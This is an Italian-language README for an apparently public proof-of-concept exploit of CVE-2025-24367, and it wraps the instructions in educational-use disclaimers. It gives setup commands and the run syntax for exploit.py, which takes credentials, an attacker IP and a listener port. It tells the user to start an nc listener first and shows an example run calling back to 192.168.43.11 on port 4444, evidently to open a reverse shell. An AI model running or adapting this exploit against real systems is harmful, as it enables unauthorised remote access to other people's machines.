
Prova di concetto per CVE-2025-24367
Importante — Leggi prima questo:
Questo repository eexploit.pysono forniti solo a scopo educativo e di ricerca. Non utilizzare questo codice contro sistemi, reti o servizi per i quali non si dispone di autorizzazione esplicita e scritta. L'accesso non autorizzato a sistemi informatici è illegale e non etico. Utilizzando questo codice accetti di rispettare le leggi applicabili e le policy istituzionali.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Prima di eseguire lo script, assicurati di avere un listener nc in esecuzione. Esegui lo script senza proxy a meno che tu non stia facendo debug:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Promemoria finale: Questo script e README sono solo a scopo educativo. Non usare mai questi strumenti per accedere illegalmente ai sistemi.